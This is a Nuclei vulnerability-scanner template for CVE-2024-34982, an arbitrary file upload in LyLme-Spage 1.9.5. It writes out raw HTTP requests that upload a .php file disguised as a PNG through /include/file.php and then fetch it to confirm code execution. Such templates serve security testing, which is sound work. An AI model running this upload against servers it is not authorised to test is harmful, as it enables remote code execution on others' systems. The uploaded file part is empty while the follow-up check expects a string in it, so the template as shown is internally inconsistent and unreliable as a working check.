id: CVE-2024-34982

info:
  name: LyLme-Spage - Arbitrary File Upload
  author: DhiyaneshDk
  severity: high
  description: |
    An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.
  impact: |
    Attackers can upload arbitrary files to execute malicious code on the LyLme-Spage server.
  remediation: |
    Update LyLme Spage to a version later than 1.9.5 that patches the arbitrary file upload vulnerability.
  reference:
    - https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md
    - https://github.com/tanjiti/sec_profile
    - https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py
  classification:
    epss-score: 0.04675
    epss-percentile: 0.90568
    cpe: cpe:2.3:a:lylme:lylme_spage:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lylme
    product: lylme_spage
    fofa-query: icon_hash="-282504889"
  tags: cve,cve2024,lylme-spage,rce,intrusive,vuln

variables:
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /include/file.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------575673989461736

        -----------------------------575673989461736
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: image/png

        -----------------------------575673989461736--

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"code":'
          - '"msg":'
          - '"url":'
          - 'php"}'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: path
        part: body
        group: 1
        regex:
          - '"url":"([/a-z_0-9.]+)"'
        internal: true

  - raw:
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{{string}}" )'
          - 'contains(header, "text/html")'
        condition: and
# digest: 4a0a00473045022100db5e1dff650a8bf53502ae4013e6fe6c760fb656c7531f81ff901497fcc3304802201fe129fed443dd917f53b86f00c0abe7ebc530596b40638ee7594d5ad215a51b:922c64590222798bb761d5b6d8e72950